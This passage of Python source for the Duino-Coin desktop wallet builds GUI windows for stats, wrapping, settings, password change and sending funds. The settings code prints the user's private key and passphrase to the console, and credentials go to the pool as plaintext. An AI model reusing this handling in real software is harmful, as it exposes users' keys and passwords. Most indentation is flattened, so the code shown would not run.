text=get_string("network_hashrate")
+ ": "
+ str(statsApi["Pool hashrate"]),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=5,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text=get_string("active_miners")
+ ": "
+ str(len(statsApi["Miners"])),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=6,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text="1 DUCO "
+ get_string("estimated_price")
+ ": $"
+ str(statsApi["Duco price"]),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=7,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text=get_string("registered_users")
+ ": "
+ str(statsApi["Registered users"]),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=8,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text=get_string("mined_duco")
+ ": "
+ str(statsApi["All-time mined DUCO"])
+ " ᕲ",
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=9,
column=1,
sticky=S + W,
padx=5)
statsWindow.mainloop()
def wrapper_window(handler):
def Wrap():
amount = amountWrap.get()
print("Got amount: ", amount)
soc = socket()
soc.connect((pool_address, int(pool_port)))
soc.recv(3)
try:
float(amount)
except Exception:
pass
else:
soc.send(bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password),
encoding="utf8"))
_ = soc.recv(10)
soc.send(
bytes(
"WRAP,"
+ str(amount)
+ ","
+ str(pub_key),
encoding="utf8"))
soc.close()
sleep(2)
wrapperWindow.quit()
try:
pubkeyfile = open(str(resources + "DUCOPubKey.pub"), "r")
except Exception:
messagebox.showerror(
title=get_string("wrapper_error_title"),
message=get_string("wrapper_error"))
else:
if TRONPY_ENABLED:
pub_key = pubkeyfile.read()
pubkeyfile.close()
wrapperWindow = Toplevel()
wrapperWindow.resizable(False, False)
wrapperWindow.title(get_string("wrapper_title"))
wrapperWindow.transient([root])
askWrapAmount = Label(
wrapperWindow,
text=get_string("wrapper_amount_to_wrap") + ":")
askWrapAmount.grid(row=0,
column=0,
sticky=N + W)
amountWrap = Entry(wrapperWindow,
border="0",
font=Font(size=15))
amountWrap.grid(row=1,
column=0,
sticky=N + W)
wrapButton = Button(wrapperWindow,
text="Wrap",
command=Wrap)
wrapButton.grid(row=2,
column=0,
sticky=N + W)
else:
messagebox.showerror(
title=get_string("wrapper_error_title"),
message=get_string("wrapper_error_tronpy"))
def unwrapper_window(handler):
def UnWrap():
pubkeyfile = open(str(resources + "DUCOPubKey.pub"), "r")
pub_key = pubkeyfile.read()
pubkeyfile.close()
passphrase = passphraseEntry.get()
privkeyfile = open(str(resources + "DUCOPrivKey.encrypt"), "r")
privKeyEnc = privkeyfile.read()
privkeyfile.close()
try:
priv_key = str(password_decrypt(privKeyEnc, passphrase))[2:66]
use_wrapper = True
except InvalidToken:
print(get_string("invalid_passphrase"))
use_wrapper = False
amount = amountUnWrap.get()
print("Got amount:", amount)
soc = socket()
soc.connect((pool_address, int(pool_port)))
soc.recv(3)
try:
float(amount)
except Exception:
pass
else:
soc.send(bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password), encoding="utf8"))
_ = soc.recv(10)
if use_wrapper:
pendingvalues = wduco.functions.pendingWithdrawals(
pub_key, username)
# transaction wasn't initiated, but variable should be declared
txn_success = False
try:
amount = float(amount)
except ValueError:
print("Value should be numeric - aborting")
else:
if int(float(amount) * 10 ** 6) >= pendingvalues:
toInit = int(float(amount) * 10 ** 6) - pendingvalues
else:
toInit = amount * 10 ** 6
if toInit > 0:
txn = (
wduco.functions.initiateWithdraw(username, toInit)
.with_owner(pub_key)
.fee_limit(5_000_000)
.build()
.sign(PrivateKey(bytes.fromhex(priv_key))))
txn = txn.broadcast()
txnfeedback = txn.result()
if txnfeedback:
txn_success = True
else:
txn_success = False
if txn_success or amount <= pendingvalues:
soc.send(
bytes(
"UNWRAP,"
+ str(amount)
+ ","
+ str(pub_key),
encoding="utf8"))
soc.close()
sleep(2)
unWrapperWindow.quit()
try:
pubkeyfile = open(str(resources + "DUCOPubKey.pub"), "r")
pubkeyfile.read()
pubkeyfile.close()
except Exception:
messagebox.showerror(
title=get_string("wrapper_error_title"),
message=get_string("wrapper_error"))
else:
if TRONPY_ENABLED:
unWrapperWindow = Toplevel()
unWrapperWindow.resizable(False, False)
unWrapperWindow.title(get_string("unwrapper_title"))
unWrapperWindow.transient([root])
unWrapperWindow.configure()
askAmount = Label(
unWrapperWindow,
text=get_string("unwrap_amount"))
askAmount.grid(row=1,
column=0,
sticky=N + W)
amountUnWrap = Entry(
unWrapperWindow,
border="0",
font=Font(size=15))
amountUnWrap.grid(row=2,
column=0,
sticky=N + W)
askPassphrase = Label(
unWrapperWindow,
text=get_string("ask_passphrase"))
askPassphrase.grid(row=4,
column=0,
sticky=N + W)
passphraseEntry = Entry(
unWrapperWindow,
border="0",
font=Font(size=15))
passphraseEntry.grid(
row=5,
column=0,
sticky=N + W)
wrapButton = Button(
unWrapperWindow,
text=get_string("unwrap_duco"),
command=UnWrap)
wrapButton.grid(
row=7,
column=0,
sticky=N + W)
else:
messagebox.showerror(
title=get_string("wrapper_error"),
message=get_string("wrapper_error_tronpy"))
def settings_window(handler):
def _wrapperconf():
if TRONPY_ENABLED:
privkey_input = StringVar()
passphrase_input = StringVar()
wrapconfWindow = Toplevel()
wrapconfWindow.resizable(False, False)
wrapconfWindow.title(get_string("wrapper_title"))
wrapconfWindow.transient([root])
wrapconfWindow.configure()
def setwrapper():
if privkey_input and passphrase_input:
priv_key = privkey_entry.get()
print("Got priv key:", priv_key)
passphrase = passphrase_entry.get()
print("Got passphrase:", passphrase)
try:
pub_key = PrivateKey(
bytes.fromhex(priv_key)
).public_key.to_base58check_address()
except Exception:
pass
else:
print("Saving data")
privkeyfile = open(
str(resources + "DUCOPrivKey.encrypt"), "w")
privkeyfile.write(
str(password_encrypt(
priv_key.encode(), passphrase
).decode()))
privkeyfile.close()
pubkeyfile = open(
str(resources + "DUCOPubKey.pub"), "w")
pubkeyfile.write(pub_key)
pubkeyfile.close()
Label(wrapconfWindow, text=get_string(
"wrapper_success")).pack()
wrapconfWindow.quit()
title = Label(
wrapconfWindow,
text=get_string("wrapper_config_title"),
font=Font(size=20))
title.grid(row=0,
column=0,
sticky=N + W,
padx=5)
askprivkey = Label(
wrapconfWindow,
text=get_string("ask_private_key"))
askprivkey.grid(row=1,
column=0,
sticky=N + W)
privkey_entry = Entry(
wrapconfWindow,
font=TEXT_FONT,
textvariable=privkey_input)
privkey_entry.grid(row=2,
column=0,
sticky=N + W)
askpassphrase = Label(wrapconfWindow,
text=get_string("passphrase"))
askpassphrase.grid(row=3,
column=0,
sticky=N + W)
passphrase_entry = Entry(
wrapconfWindow,
font=TEXT_FONT,
textvariable=passphrase_input)
passphrase_entry.grid(row=4,
column=0,
sticky=N + W)
wrapConfigButton = Button(
wrapconfWindow,
text=get_string("configure_wrapper_lowercase"),
command=setwrapper)
wrapConfigButton.grid(row=5,
column=0,
sticky=N + W)
wrapconfWindow.mainloop()
else:
messagebox.showerror(
title=get_string("wrapper_error"),
message=get_string("wrapper_error_tronpy"))
def _logout():
try:
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute("DELETE FROM UserData")
con.commit()
except Exception as e:
print(e)
try:
execl(sys.executable, sys.executable, *sys.argv)
except Exception as e:
print(e)
def _cleartrs():
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute("DELETE FROM transactions")
con.commit()
def _chgpass():
def _changepassprotocol():
oldpasswordS = oldpassword.get()
newpasswordS = newpassword.get()
confpasswordS = confpassword.get()
if oldpasswordS != newpasswordS:
if oldpasswordS and newpasswordS and confpasswordS:
if newpasswordS == confpasswordS:
soc = socket()
soc.connect((pool_address, int(pool_port)))
soc.recv(3)
soc.send(
bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password), encoding="utf8"))
soc.recv(2)
soc.send(
bytes(
"CHGP,"
+ str(oldpasswordS)
+ ","
+ str(newpasswordS),
encoding="utf8"))
response = soc.recv(128).decode(
"utf8").rstrip("\n").split(",")
soc.close()
if not "OK" in response[0]:
messagebox.showerror(
title=get_string("change_passwd_error"),
message=response[1])
else:
messagebox.showinfo(
title=get_string("change_passwd_ok"),
message=response[1])
try:
try:
with sqlconn(
resources + "wallet.db"
) as con:
cur = con.cursor()
cur.execute("DELETE FROM UserData")
con.commit()
except Exception as e:
print(e)
except FileNotFoundError:
pass
execl(sys.executable, sys.executable, *sys.argv)
else:
messagebox.showerror(
title=get_string("change_passwd_error"),
message=get_string("error_passwd_dont_match"))
else:
messagebox.showerror(
title=get_string("change_passwd_error"),
message=get_string("fill_the_blanks_warning"))
else:
messagebox.showerror(
title=get_string("change_passwd_error"),
message=get_string("same_passwd_error"))
settingsWindow.destroy()
changepassWindow = Toplevel()
changepassWindow.title(get_string("change_passwd_lowercase"))
changepassWindow.resizable(False, False)
changepassWindow.transient([root])
changepassWindow.configure(background=BACKGROUND_COLOR)
TEXT_FONT_BOLD = Font(changepassWindow, size=12, weight="bold")
TEXT_FONT = Font(changepassWindow, size=12, weight="normal")
Label(
changepassWindow,
text=get_string("old_passwd"),
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=0,
sticky=W,
padx=5)
oldpassword = Entry(
changepassWindow,
show="*",
font=TEXT_FONT,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
oldpassword.grid(row=1,
sticky="nswe",
padx=5)
Label(
changepassWindow,
text=get_string("new_passwd"),
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=2,
sticky=W,
padx=5)
newpassword = Entry(
changepassWindow,
show="*",
font=TEXT_FONT,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
newpassword.grid(row=3,
sticky="nswe",
padx=5)
Label(
changepassWindow,
text=get_string("confirm_new_passwd"),
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=4,
sticky=W,
padx=5)
confpassword = Entry(
changepassWindow,
show="*",
font=TEXT_FONT,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
confpassword.grid(row=5,
sticky="nswe",
padx=5)
chgpbtn = Button(
changepassWindow,
text=get_string("change_passwd"),
command=_changepassprotocol,
foreground=FOREGROUND_COLOR,
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR)
chgpbtn.grid(columnspan=2,
sticky="nswe",
pady=5,
padx=5)
settingsWindow = Toplevel()
settingsWindow.resizable(False, False)
settingsWindow.title(get_string("settings_title"))
settingsWindow.transient([root])
settingsWindow.configure(background=BACKGROUND_COLOR)
TEXT_FONT = Font(
settingsWindow,
size=12,
weight="normal")
TEXT_FONT_BOLD_LARGE = Font(
settingsWindow,
size=12,
weight="bold")
Label(
settingsWindow,
text=get_string("uppercase_settings"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=0,
column=0,
columnspan=4,
sticky=S + W,
pady=(5, 5),
padx=(5, 0))
logoutbtn = Button(
settingsWindow,
text=get_string("logout"),
command=_logout,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
foreground=FONT_COLOR)
logoutbtn.grid(row=1,
column=0,
columnspan=4,
sticky="nswe",
padx=5)
chgpassbtn = Button(
settingsWindow,
text=get_string("change_passwd"),
command=_chgpass,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
foreground=FONT_COLOR)
chgpassbtn.grid(row=2,
column=0,
columnspan=4,
sticky="nswe",
padx=5)
wrapperconfbtn = Button(
settingsWindow,
text=get_string("configure_wrapper"),
command=_wrapperconf,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
foreground=FONT_COLOR)
wrapperconfbtn.grid(row=3,
column=0,
columnspan=4,
sticky="nswe",
padx=5)
cleartransbtn = Button(
settingsWindow,
text=get_string("clear_transactions"),
command=_cleartrs,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
foreground=FONT_COLOR)
cleartransbtn.grid(row=4,
column=0,
columnspan=4,
sticky="nswe",
padx=5)
separator = ttk.Separator(settingsWindow, orient="horizontal")
separator.grid(
row=5,
column=0,
columnspan=4,
sticky=N + S + E + W,
padx=(5, 5),
pady=5)
Label(
settingsWindow,
text=get_string("logged_in_as")
+ ": "
+ str(username),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(
row=6,
column=0,
columnspan=4,
padx=5,
sticky=S + W)
Label(
settingsWindow,
text=get_string("wallet_version")
+ ": "
+ str(VERSION),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(
row=7,
column=0,
columnspan=4,
padx=5,
sticky=S + W)
Label(
settingsWindow,
text=get_string("translation_author_message")
+ " "
+ get_string("translation_author"),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(
row=8,
column=0,
columnspan=4,
padx=5,
sticky=S + W)
Label(
settingsWindow,
text=get_string("config_dev_warning"),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(
row=9,
column=0,
columnspan=4,
padx=5,
sticky=S + W)
separator = ttk.Separator(settingsWindow, orient="horizontal")
separator.grid(
row=10,
column=0,
columnspan=4,
sticky=N + S + E + W,
padx=(5, 5),
pady=5)
original = Image.open(resources + "duco.png")
resized = original.resize((48, 48), Image.ANTIALIAS)
website = ImageTk.PhotoImage(resized)
website.image = website
websiteLabel = Label(
settingsWindow,
image=website,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
websiteLabel.grid(
row=11,
column=0,
sticky=N + S + E + W,
padx=(5, 0),
pady=(0, 5))
websiteLabel.bind("<Button-1>", openWebsite)
original = Image.open(resources + "github.png")
resized = original.resize((48, 48), Image.ANTIALIAS)
github = ImageTk.PhotoImage(resized)
github.image = github
githubLabel = Label(
settingsWindow,
image=github,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
githubLabel.grid(
row=11,
column=1,
sticky=N + S + E + W,
pady=(0, 5))
githubLabel.bind("<Button-1>", openGitHub)
original = Image.open(resources + "exchange.png")
resized = original.resize((48, 48), Image.ANTIALIAS)
exchange = ImageTk.PhotoImage(resized)
exchange.image = exchange
exchangeLabel = Label(
settingsWindow,
image=exchange,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
exchangeLabel.grid(
row=11,
column=2,
sticky=N + S + E + W,
pady=(0, 5))
exchangeLabel.bind("<Button-1>", openExchange)
original = Image.open(resources + "discord.png")
resized = original.resize((48, 48), Image.ANTIALIAS)
discord = ImageTk.PhotoImage(resized)
discord.image = discord
discordLabel = Label(
settingsWindow,
image=discord,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
discordLabel.grid(
row=11,
column=3,
sticky=N + S + E + W,
padx=(0, 5),
pady=(0, 5))
discordLabel.bind("<Button-1>", openDiscord)
def get_balance():
global oldbalance
global balance
global unpaid_balance
global global_balance
global gtxl
try:
soc = socket()
soc.connect((pool_address, int(pool_port)))
soc.recv(3)
soc.send(bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password), encoding="utf8"))
_ = soc.recv(2)
soc.send(bytes(
"BALA",
encoding="utf8"))
oldbalance = balance
balance = float(soc.recv(64).decode().rstrip("\n"))
global_balance = round(float(balance), 8)
try:
gtxl = {}
soc.send(bytes(
"GTXL," + str(username) + ",7",
encoding="utf8"))
gtxl = str(soc.recv(8096).decode().rstrip(
"\n").replace("\'", "\""))
gtxl = jsonloads(gtxl)
except Exception as e:
print("Error getting transaction list: " + str(e))
if oldbalance != balance:
difference = float(balance) - float(oldbalance)
dif_with_unpaid = (
float(balance) - float(oldbalance)) + unpaid_balance
if float(balance) != float(difference):
if (dif_with_unpaid >= MIN_TRANSACTION_VALUE
or dif_with_unpaid < 0
):
now = datetime.now()
difference = round(dif_with_unpaid, 8)
if (
difference >= MIN_TRANSACTION_VALUE_NOTIFY
or difference < 0
and notificationsEnabled
):
notification = Notify()
notification.title = get_string("duino_coin_wallet")
notification.message = (
get_string("notification_new_transaction")
+ "\n"
+ now.strftime("%d.%m.%Y %H:%M:%S\n")
+ str(round(difference, 6))
+ " DUCO")
notification.icon = resources + "duco_color.png"
notification.send(block=False)
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute(
"""INSERT INTO Transactions(Date, amount)
VALUES(?, ?)""", (
now.strftime("%d.%m.%Y %H:%M:%S"),
round(difference, 8)))
con.commit()
unpaid_balance = 0
else:
unpaid_balance += float(balance) - float(oldbalance)
except Exception as e:
print("Retrying in 3s. (" + str(e) + ")")
Timer(3, get_balance).start()
def get_wbalance():
if TRONPY_ENABLED:
try:
pubkeyfile = open(str(resources + "DUCOPubKey.pub"), "r")
pub_key = pubkeyfile.read()
pubkeyfile.close()
wBalance = float(wduco.functions.balanceOf(pub_key)) / (10 ** 6)
return wBalance
except Exception:
return 0.0
else:
return 0.0
def update_balance_labels():
global profit_array, profitCheck
try:
balancetext.set(str(round(global_balance, 7)) + " ᕲ")
wbalancetext.set(str(get_wbalance()) + " wᕲ")
balanceusdtext.set(
"$" + str(round(global_balance * duco_fiat_value, 4)))
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute("SELECT rowid,* FROM Transactions ORDER BY rowid DESC")
Transactions = cur.fetchall()
transactionstext_format = ""
for i, row in enumerate(Transactions, start=1):
transactionstext_format += str(row[1]) + " " + str(row[2]) + " DUCO\n"
if i == 6:
transactionstext_format = transactionstext_format.rstrip("\n")
break
transactionstext.set(transactionstext_format)
if profit_array[2] != 0:
sessionprofittext.set(
get_string("session") + ": "
+ str(profit_array[0]) + " ᕲ")
minuteprofittext.set(
"≈" + str(profit_array[1]) + " ᕲ/"
+ get_string("minute"))
hourlyprofittext.set(
"≈" + str(profit_array[2]) + " ᕲ/"
+ get_string("hour"))
dailyprofittext.set(
"≈"
+ str(profit_array[3])
+ " ᕲ/"
+ get_string("day")
+ " ($"
+ str(round(profit_array[3] * duco_fiat_value, 4))
+ ")")
else:
if profitCheck > 10:
sessionprofittext.set(get_string("sessionprofit_unavailable1"))
minuteprofittext.set(get_string("sessionprofit_unavailable2"))
hourlyprofittext.set("")
dailyprofittext.set("")
profitCheck += 1
except Exception:
_exit(0)
Timer(1, update_balance_labels).start()
def profit_calculator(start_bal):
try: # Thanks Bilaboz for the code!
global curr_bal, profit_array
prev_bal = curr_bal
curr_bal = global_balance
session = curr_bal - start_bal
tensec = curr_bal - prev_bal
minute = tensec * 6
hourly = minute * 60
daily = hourly * 24
if tensec >= 0:
profit_array = [
round(session, 8),
round(minute, 6),
round(hourly, 4),
round(daily, 2)]
except Exception:
_exit(0)
Timer(10, profit_calculator, [start_bal]).start()
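# Worked example of the extrapolation above (numbers are illustrative only):
# a 10-second gain of 0.05 DUCO gives 0.05 * 6 = 0.3 DUCO/min, 0.3 * 60 = 18 DUCO/h
# and 18 * 24 = 432 DUCO/day, i.e. profit_array becomes [session, 0.3, 18.0, 432.0]
# after the rounding applied in profit_calculator().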
def send_funds_protocol(handler):
recipientStr = recipient.get()
amountStr = amount.get()
MsgBox = messagebox.askquestion(
get_string("warning"),
get_string("send_funds_warning")
+ str(amountStr)
+ " DUCO "
+ get_string("send_funds_to")
+ " "
+ str(recipientStr),
icon="warning",)
if MsgBox == "yes":
soc = socket()
soc.connect((pool_address, int(pool_port)))
soc.recv(3)
soc.send(bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password),
encoding="utf8"))
response = soc.recv(2)
soc.send(
bytes(
"SEND,"
+ "-"
+ ","
+ str(recipientStr)
+ ","
+ str(amountStr),
encoding="utf8"))
response = soc.recv(128).decode().rstrip("\n").split(",")
soc.close()
if "OK" in str(response[0]):
MsgBox = messagebox.showinfo(response[0],
response[1]
+ "\nTXID:"
+ response[2])
else:
MsgBox = messagebox.showwarning(response[0], response[1])
root.update()
def init_rich_presence():
global RPC
try:
RPC = Presence(806985845320056884)
RPC.connect()
except Exception: # Discord not launched
pass
def update_rich_presence():
startTime = int(time())
while True:
try:
balance = round(global_balance, 4)
RPC.update(
details=str(balance)
+ " ᕲ ($"
+ str(round(duco_fiat_value * balance, 2))
+ ")",
start=startTime,
large_image="duco",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything, "
+ "including AVR boards",
buttons=[
{"label": "Learn more",
"url": "https://duinocoin.com"},
{"label": "Discord Server",
"url": "https://discord.gg/k48Ht5y"}])
except Exception: # Discord not launched
pass
sleep(15)
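# Illustrative sketch only: the plain-text exchange this wallet repeats against the pool.
# The framing (3-byte greeting, "LOGI,user,pass", short acknowledgement, then one command
# per connection) mirrors the calls elsewhere in this file; it is not an authoritative
# protocol specification, and this helper is never called by the wallet itself.
def _example_fetch_balance(user, passwd):
    from socket import socket  # same import the wallet uses at module level
    soc = socket()
    soc.connect((pool_address, int(pool_port)))
    soc.recv(3)                                   # server version greeting
    soc.send(bytes("LOGI," + user + "," + passwd, encoding="utf8"))
    soc.recv(2)                                   # login acknowledgement
    soc.send(bytes("BALA", encoding="utf8"))      # ask for the account balance
    balance = float(soc.recv(64).decode().rstrip("\n"))
    soc.close()
    return balance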
class Wallet:
def __init__(self, master):
global recipient
global amount
global balancetext
global wbalancetext
global sessionprofittext
global minuteprofittext
global hourlyprofittext
global dailyprofittext
global balanceusdtext
global transactionstext
global curr_bal
global profit_array
try:
loading.destroy()
except Exception:
pass
textFont4 = Font(
size=14,
weight="bold")
TEXT_FONT_BOLD_LARGE = Font(
size=12,
weight="bold")
TEXT_FONT_BOLD = Font(
size=18,
weight="bold")
TEXT_FONT = Font(
size=12,
weight="normal")
self.master = master
master.resizable(False, False)
master.configure(background=BACKGROUND_COLOR)
master.title(get_string("duino_coin_wallet"))
Label(
master,
text=get_string("uppercase_duino_coin_wallet")
+ ": "
+ str(username),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(
row=0,
column=0,
sticky=S + W,
columnspan=4,
pady=(5, 0),
padx=(5, 0))
balancetext = StringVar()
wbalancetext = StringVar()
balancetext.set(get_string("please_wait"))
if TRONPY_ENABLED:
wbalancetext.set(get_string("please_wait"))
else:
wbalancetext.set("0.00")
balanceLabel = Label(
master,
textvariable=balancetext,
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
balanceLabel.grid(row=1,
column=0,
columnspan=3,
sticky=S + W,
padx=(5, 0))
wbalanceLabel = Label(
master,
textvariable=wbalancetext,
font=textFont4,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
wbalanceLabel.grid(row=2,
column=0,
columnspan=3,
sticky=S + W,
padx=(5, 0))
balanceusdtext = StringVar()
balanceusdtext.set(get_string("please_wait"))
Label(
master,
textvariable=balanceusdtext,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=1,
column=3,
sticky=S + E,
pady=(0, 1.5),
padx=(0, 5))
separator = ttk.Separator(master, orient="horizontal")
separator.grid(
row=4,
column=0,
sticky=N + S + E + W,
columnspan=4,
padx=(5, 5),
pady=(0, 5))
def clear_recipient_placeholder(self):
recipient.delete("0", "100")
def clear_amount_placeholder(self):
amount.delete("0", "100")
Label(
master,
text=get_string("recipient"),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=5,
column=0,
sticky=W + S,
padx=(5, 0))
recipient = Entry(
master,
border="0",
font=TEXT_FONT,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
recipient.grid(row=5,
column=1,
sticky=N + W + S + E,
columnspan=3,
padx=(0, 5))
recipient.insert("0", "revox")
recipient.bind("<FocusIn>", clear_recipient_placeholder)
Label(
master,
text=get_string("amount"),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=6,
column=0,
sticky=W + S,
padx=(5, 0))
amount = Entry(
master,
border="0",
font=TEXT_FONT,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
amount.grid(row=6,
column=1,
sticky=N + W + S + E,
columnspan=3,
padx=(0, 5))
amount.insert("0", str(VERSION))
amount.bind("<FocusIn>", clear_amount_placeholder)
sendLabel = Button(
master,
text=get_string("send_funds"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR)
sendLabel.grid(
row=8,
column=0,
sticky=N + S + E + W,
columnspan=4,
padx=(5),
pady=(1, 2))
sendLabel.bind("<Button-1>", send_funds_protocol)
wrapLabel = Button(
master,
text=get_string("wrap_duco"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR)
wrapLabel.grid(
row=9,
column=0,
sticky=N + S + E + W,
columnspan=2,
padx=(5, 1),
pady=(1, 5))
wrapLabel.bind("<Button-1>", wrapper_window)
wrapLabel = Button(
master,
text=get_string("unwrap_duco"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR)
wrapLabel.grid(
row=9,
column=2,
sticky=N + S + E + W,
columnspan=2,
padx=(1, 5),
pady=(1, 5))
wrapLabel.bind("<Button-1>", unwrapper_window)
separator = ttk.Separator(master, orient="horizontal")
separator.grid(
row=10,
column=0,
sticky=N + S + E + W,
columnspan=4,
padx=(5, 5))
Label(
master,
text=get_string("estimated_profit"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=11,
column=0,
sticky=S + W,
columnspan=4,
pady=(5, 0),
padx=(5, 0))
sessionprofittext = StringVar()
sessionprofittext.set(get_string("please_wait_calculating"))
sessionProfitLabel = Label(
master,
textvariable=sessionprofittext,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
sessionProfitLabel.grid(
row=12,
column=0,
sticky=W,
columnspan=4,
padx=5)
minuteprofittext = StringVar()
minuteProfitLabel = Label(
master,
textvariable=minuteprofittext,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
minuteProfitLabel.grid(
row=13,
column=0,
sticky=W,
columnspan=4,
padx=5)
hourlyprofittext = StringVar()
hourlyProfitLabel = Label(
master,
textvariable=hourlyprofittext,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
hourlyProfitLabel.grid(
row=14,
column=0,
sticky=W,
columnspan=4,
padx=5)
dailyprofittext = StringVar()
dailyprofittext.set("")
dailyProfitLabel = Label(
master,
textvariable=dailyprofittext,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
dailyProfitLabel.grid(
row=15,
column=0,
sticky=W,
columnspan=4,
padx=5)
separator = ttk.Separator(master, orient="horizontal")
separator.grid(
row=16,
column=0,
sticky=N + S + E + W,
columnspan=4,
padx=5)
Label(
master,
text=get_string("local_transactions"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=17,
column=0,
sticky=S + W,
columnspan=4,
pady=(5, 0),
padx=(5, 0))
transactionstext = StringVar()
transactionstext.set("")
transactionstextLabel = Label(
master,
textvariable=transactionstext,
font=TEXT_FONT,
justify=LEFT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
transactionstextLabel.grid(
row=18,
column=0,
sticky=W,
columnspan=4,
padx=5,
pady=(0, 5))
separator = ttk.Separator(master,
orient="horizontal")
separator.grid(
row=19,
column=0,
sticky=N + S + E + W,
columnspan=4,
padx=5,
pady=(0, 10))
original = Image.open(resources + "transactions.png")
resized = original.resize((58, 58), Image.ANTIALIAS)
transactions = ImageTk.PhotoImage(resized)
transactions.image = transactions
transactionsLabel = Label(
master,
image=transactions,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
transactionsLabel.grid(
row=20,
column=0,
sticky=N + S + W + E,
pady=(0, 5))
transactionsLabel.bind("<Button>", transactions_window)
original = Image.open(resources + "calculator.png")
resized = original.resize((58, 58), Image.ANTIALIAS)
calculator = ImageTk.PhotoImage(resized)
calculator.image = calculator
calculatorLabel = Label(
master,
image=calculator,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
calculatorLabel.grid(
row=20,
column=1,
sticky=N + S + W + E,
padx=(0, 5),
pady=(0, 5))
calculatorLabel.bind("<Button>", currency_converter_window)
original = Image.open(resources + "stats.png")
resized = original.resize((58, 58), Image.ANTIALIAS)
stats = ImageTk.PhotoImage(resized)
stats.image = stats
statsLabel = Label(
master,
image=stats,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
statsLabel.grid(
row=20,
column=2,
sticky=N + S + W + E,
padx=(0, 5),
pady=(0, 5))
statsLabel.bind("<Button>", statistics_window)
original = Image.open(resources + "settings.png")
resized = original.resize((58, 58), Image.ANTIALIAS)
settings = ImageTk.PhotoImage(resized)
settings.image = settings
settingsLabel = Label(
master,
image=settings,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
settingsLabel.grid(
row=20,
